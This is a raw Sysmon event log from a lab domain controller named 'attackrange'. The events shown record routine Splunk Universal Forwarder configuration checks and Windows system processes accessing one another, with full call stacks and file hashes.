08:41:24.246{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B4-5F84-4B00-000000007F01}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.253{5D479F2C-16B4-5F84-4B00-000000007F01}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.199{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B3-5F84-4A00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.199{5D479F2C-16B3-5F84-4A00-000000007F01}37803776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5700-000000007F01}3732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5700-000000007F01}3732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16B5-5F84-5600-000000007F01}22762272C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B5-5F84-5700-000000007F01}3732C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.811{5D479F2C-16B5-5F84-5700-000000007F01}3732C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B5-5F84-5600-000000007F01}2276C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.808{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5600-000000007F01}2276C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 